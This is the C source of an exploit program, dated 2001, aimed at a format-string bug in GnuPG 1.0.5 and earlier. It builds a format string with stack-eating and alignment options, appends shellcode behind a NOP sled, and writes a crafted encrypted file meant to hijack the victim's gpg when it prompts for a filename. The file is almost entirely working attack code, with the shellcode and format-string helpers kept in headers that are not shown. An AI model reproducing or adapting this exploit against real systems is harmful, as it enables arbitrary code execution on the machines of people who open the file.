/*
 * exgnupg.c - Remote GnuPG exploit for version <= 1.0.5 
 *
 * Copyright (c) 2001 - fish stiqz <fish@analog.org>
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <ctype.h>

#include "common.h"
#include "fmtstr.h"
#include "config.h"
#include "shellcode.h"

extern int errno;
extern char *optarg;


/*
 * This function taken almost completely from the gpg-1.0.4 source.
 * This is needed in order to calculate the size of the converted
 * address buffer.
 */
char *make_printable_string( const char *p, size_t n, int delim )
{
    size_t save_n, buflen;
    const char *save_p;
    char *buffer, *d;

    /* first count length */
    for(save_n = n, save_p = p, buflen=1 ; n; n--, p++ ) {
        if( iscntrl( *p ) || *p == delim ) {
            if( *p=='\n' || *p=='\r' || *p=='\f'
                || *p=='\v' || *p=='\b' || !*p )
                buflen += 2;
            else
                buflen += 4;
        }
        else
            buflen++;
    }
    p = save_p;
    n = save_n;
    /* and now make the string */
    d = buffer = Malloc( buflen );
    for( ; n; n--, p++ ) {
        if( iscntrl( *p ) || *p == delim ) {
            *d++ = '\\';
            if( *p == '\n' )
                *d++ = 'n';
            else if( *p == '\r' )
                *d++ = 'r';
            else if( *p == '\f' )
                *d++ = 'f';
            else if( *p == '\v' )
                *d++ = 'v';
            else if( *p == '\b' )
                *d++ = 'b';
            else if( !*p )
                *d++ = '0';
            else {
                sprintf(d, "x%02x", *p );
                d += 2;
            }
        }
        else
            *d++ = *p;
    }
    *d = 0;
    return buffer;
}


/* 
 * returns the length of a string returned by 'make_printable_string'.
 * this function is for use by mkfmtstr_short.
 */
unsigned int len_mkprt(char *str)
{
    unsigned int len;
    char *c_str = make_printable_string(str, strlen(str), 0);
    
    len = strlen(c_str);
    free(c_str);

    return len;
}



/*
 * prints the usage message and then exits.
 */
void usage(char *p)
{
    fprintf(stderr,
	    "usage: %s -e <eats> -a <0-15> -k <keyid> [other options]\n"
	    "\t-e\tthe number of stack eats\n"
	    "\t-a\tthe number of bytes of alignment to add to the fmt string\n"
	    "\t-k\tthe key id to encrypt with\n"
	    "\t-p\tthe path to the gpg binary\n"
	    "\t-s\tchecks the shellcode for iscntrl() characters\n"
	    "\t-E\tuses a format string that eats off stack values\n"
	    "\t-D\tuses a format string to display the stack values\n"
	    "\t-h\tthis help text\n",
	    p);
    exit(EXIT_FAILURE);
}

int main(int argc, char **argv)
{
    char *gpg_path = DEFAULT_GPG_PATH;
    char *fmt_str;
    char *fmt_file = NULL;
    char *key_id = NULL;
    unsigned int eats = 0, align = 0, check_code = 0;
    unsigned int initial = strlen("Enter new filename [");
    int c;

    enum { TYPE_EXP, TYPE_EAT, TYPE_DISP };
    unsigned int fmt_type = TYPE_EXP;

    while((c = getopt(argc, argv, "e:a:k:p:sEDh")) != EOF)
    {
	switch(c)
	{
	case 'e':
	    eats = strtoul(optarg, NULL, 0);
	    break;

	case 'a':
	    align = strtoul(optarg, NULL, 0) % 16;
	    break;

	case 'k':
	    key_id = optarg;
	    break;

	case 'p':
	    gpg_path = optarg;
	    break;

	case 's':
	    check_code = 1;
	    break;

	case 'E':
	    fmt_type = TYPE_EAT;
	    break;

	case 'D':
	    fmt_type = TYPE_DISP;
	    break;

	default:
	    usage(argv[0]);
	    break;
	}
    }

    /* check for valid arguments */
    if(eats == 0 || key_id == NULL)
	usage(argv[0]);


    /* create the requested format string */
    switch(fmt_type)
    {
    case TYPE_EAT:
	fmt_str = mkfmtstr_eat(eats);
	break;

    case TYPE_DISP:
	fmt_str = mkfmtstr_disp(0x41414141, 0x52525252, eats);
	break;

    default:
	fmt_str = mkfmtstr_short(short_array, eats, initial, len_mkprt);
	break;
    }

    if(APPEND != NULL && fmt_type != TYPE_EAT)
    {
	if(ARCHNOP == NULL)
	{
	    print_err("oops you forgot to define ARCHNOP\n");
	    return EXIT_FAILURE;
	}

	if(check_code)
	{
	    if(check_shellcode(APPEND))
		print_msg("shellcode passed.\n");
	
	    else
	    {
		print_msg("shellcode failed, aborting.\n");
		return EXIT_FAILURE;
	    }
	}
	fmt_str = add_shellcode(fmt_str, APPEND, ARCHNOP);
    }
    
    /* add the alignment bytes.  We aren't going to automatically calculate 
       this value because we are not sure of the remote environment.  */
    fmt_str = add_align(fmt_str, align);

#ifdef DEBUG
    printf("fmt str: %s\n", fmt_str);
#endif

    /* make the dummy file */
    if((fmt_file = create_file(fmt_str, gpg_path, key_id)) == NULL)
    {
	print_err("failed to create the dummy file. aborting.\n");
	return EXIT_FAILURE;
    }
    else
	print_msg("created dummy file successfully.\n");
    
    return EXIT_FAILURE;
}
    
